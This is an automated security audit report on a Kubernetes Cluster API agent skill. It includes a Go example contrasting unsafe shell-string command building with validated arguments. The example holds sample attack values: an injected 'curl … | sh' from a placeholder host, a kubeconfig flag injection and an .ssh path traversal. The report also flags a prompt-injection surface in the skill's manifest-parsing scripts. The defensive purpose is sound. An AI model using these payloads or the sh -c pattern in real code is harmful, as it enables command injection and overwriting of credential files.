k8s-cluster-api

Fail

Audited by Gen Agent Trust Hub on Apr 21, 2026

Risk Level: HIGH (EXTERNAL_DOWNLOADS, COMMAND_EXECUTION)
Full Analysis
  • [EXTERNAL_DOWNLOADS]: The skill provides instructions in SKILL.md and references/clusterctl.md to download the clusterctl binary from the official Kubernetes-SIGs GitHub repository (github.com/kubernetes-sigs/cluster-api). This source is a well-known and trusted repository within the Kubernetes ecosystem.
  • [COMMAND_EXECUTION]: Instructions in the quick start and reference guides direct the user to use sudo for installing the downloaded CLI tool into system-wide executable paths (e.g., /usr/local/bin/). Additionally, node bootstrap templates in references/bootstrap.md include configuration for passwordless sudo access for administrative users on provisioned cluster nodes.
  • [COMMAND_EXECUTION]: The skill ships with several Go-based utility scripts in the scripts/ directory. These scripts (e.g., audit-security, check-cluster-health, export-cluster-state) utilize the os/exec package to run kubectl and clusterctl commands. These scripts also perform file system operations, such as creating diagnostic directories and writing exported cluster state to local YAML files.
  • [COMMAND_EXECUTION]: The skill exhibits an indirect prompt injection surface through its manifest validation and linting scripts (scripts/validate-manifests/main.go, scripts/lint-cluster-templates/main.go).
    • Ingestion points: These scripts parse data from external YAML manifests supplied by the user for validation.
    • Boundary markers: The Go parsing logic contains no explicit boundary markers or instructions to ignore embedded commands.
    • Capability inventory: The skill includes scripts that can execute system commands (kubectl, clusterctl) and write to the local filesystem.
    • Sanitization: The scripts do not interpret manifest content as shell commands directly, but the parsed data is used to populate parameters for the diagnostic and management tools. Manifest fields therefore reach os/exec as command arguments, so a crafted field value (for example a name beginning with "-" or containing path separators) is an argument-injection or path-handling risk even without a shell, unless it is validated first.
  • [SAFE]: Secret management instructions correctly advise the use of environment variables or Kubernetes Secrets. Templates such as assets/aws-credentials.yaml and assets/azure-credentials.yaml use clear placeholders for credentials rather than hardcoding sensitive data.
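The argument-injection point in the COMMAND_EXECUTION finding above, as an added example that is not code from the audited skill or its scripts/ directory. It contrasts the anti-pattern (manifest data concatenated into a `sh -c` string) with a validated argv build and a bounded export path. The function names (`unsafeKubectlCmd`, `safeKubectlArgs`, `safeOutputPath`) and the sample name values are hypothetical and constructed for the example; the name syntax check follows the DNS-1123 subdomain rule Kubernetes applies to most object names.

```go
package main

import (
	"errors"
	"fmt"
	"os/exec"
	"path/filepath"
	"regexp"
	"strings"
)

// Constructed sample values standing in for metadata.name fields read from a
// user-supplied manifest. Hypothetical, not taken from the audited skill.
const (
	benignName   = "workload-cluster-01"
	injectedName = "prod; curl http://example.invalid/x | sh" // shell metacharacters
	flagName     = "--kubeconfig=/tmp/attacker.kubeconfig"   // argument injection
	traversal    = "../../.ssh/authorized_keys"              // path traversal
)

// dns1123Subdomain is the syntax Kubernetes enforces for most object names:
// lowercase alphanumerics, '-' and '.', starting and ending alphanumeric.
// A value that passes cannot start with '-', so kubectl cannot parse it as a flag.
var dns1123Subdomain = regexp.MustCompile(`^[a-z0-9]([-a-z0-9]*[a-z0-9])?(\.[a-z0-9]([-a-z0-9]*[a-z0-9])?)*$`)

// resourceType matches the lowercase resource spellings kubectl accepts,
// including fully qualified forms such as clusters.cluster.x-k8s.io.
var resourceType = regexp.MustCompile(`^[a-z][a-z0-9.-]*$`)

func validName(s string) bool { return len(s) <= 253 && dns1123Subdomain.MatchString(s) }

// unsafeKubectlCmd is the anti-pattern: manifest data concatenated into a shell
// string. Everything after ';' in name runs as a second command.
func unsafeKubectlCmd(kind, name string) *exec.Cmd {
	return exec.Command("sh", "-c", "kubectl get "+kind+" "+name+" -o yaml")
}

// safeKubectlArgs validates each manifest-derived field before it becomes an
// argv element. No shell is involved, and the syntax check blocks a leading '-'.
func safeKubectlArgs(kind, name, namespace string) ([]string, error) {
	if !resourceType.MatchString(kind) {
		return nil, fmt.Errorf("refusing resource type %q", kind)
	}
	for _, v := range []string{name, namespace} {
		if !validName(v) {
			return nil, fmt.Errorf("refusing manifest-derived value %q", v)
		}
	}
	return []string{"get", kind, name, "-n", namespace, "-o", "yaml"}, nil
}

// safeKubectlCmd builds the command from an argv slice, never via sh -c.
func safeKubectlCmd(kind, name, namespace string) (*exec.Cmd, error) {
	args, err := safeKubectlArgs(kind, name, namespace)
	if err != nil {
		return nil, err
	}
	return exec.Command("kubectl", args...), nil
}

// safeOutputPath maps a manifest-derived name to <dir>/<name>.yaml and refuses
// anything that would resolve outside dir, so an export cannot overwrite
// arbitrary files. The Rel check is a second line of defense behind the
// separator check.
func safeOutputPath(dir, name string) (string, error) {
	if strings.ContainsAny(name, `/\`) {
		return "", errors.New("name must not contain path separators")
	}
	p := filepath.Join(dir, name+".yaml")
	rel, err := filepath.Rel(dir, p)
	if err != nil || rel == ".." || strings.HasPrefix(rel, "../") {
		return "", errors.New("output path escapes export directory")
	}
	return p, nil
}

func main() {
	for _, n := range []string{benignName, injectedName, flagName, traversal} {
		_, err := safeKubectlArgs("clusters", n, "default")
		fmt.Printf("name %q accepted: %v\n", n, err == nil)
	}
	fmt.Println("shell form argv:", unsafeKubectlCmd("clusters", injectedName).Args)
}
```

The validated path is the right shape for a script such as export-cluster-state: every value that originated in a manifest is checked against the syntax Kubernetes itself requires before it is handed to kubectl or used to name a file, and the command is built with exec.Command and separate arguments rather than a shell string.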
Recommendations
  • HIGH: Downloads and executes remote code from: https://github.com/kubernetes-sigs/cluster-api/releases/download/v1.12.0/clusterctl-linux-amd64 - DO NOT USE without thorough review. At minimum, keep the version pinned and verify the downloaded binary against the checksum published with that release before installing it with sudo into /usr/local/bin/.
Audit Metadata
Risk Level: HIGH
Analyzed: Apr 21, 2026, 12:21 AM